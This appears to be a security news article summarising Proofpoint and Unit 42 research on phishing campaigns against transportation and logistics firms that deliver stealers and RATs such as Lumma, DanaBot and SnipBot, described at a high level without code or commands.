 |
Transportation and logistics organizations in North America are the focus of a new phishing effort that delivers a range of information stealers and remote access trojans (RATs).
The activity cluster, says Proofpoint, takes advantage of hacked genuine email accounts belonging to transportation and shipping organizations so as to insert harmful information into current email discussions.
As many as 15 hacked email accounts have been detected as utilized as part of the operation. It's presently not known how these accounts are compromised in the first place or who is behind the assaults.
"Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport," the enterprise security company claimed in a research released Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains entail sending mails having internet shortcut (.URL) attachments or Google Drive URLs leading to a .URL file that when opened, utilizes Server Message Block (SMB) to download the next-stage payload containing the malware from a remote drive.
Some variations of the campaign identified in August 2024 have also grabbed onto a newly popular tactic dubbed ClickFix to deceive users into installing the DanaBot malware under the premise of resolving a problem with displaying document content in the web browser.
Specifically, this entails pushing users to copy and paste a Base64-encoded PowerShell script into the terminal, therefore beginning the infection process.
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint claimed.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the development of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) dubbed SnipBot that's transmitted via spurious links contained inside phishing emails. Some components of the campaign were previously noted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel explained.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
While systems infected with RomCom have also witnessed ransomware deployments in the past, the cybersecurity company pointed out the absence of this behavior, raising the possibility that the threat behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.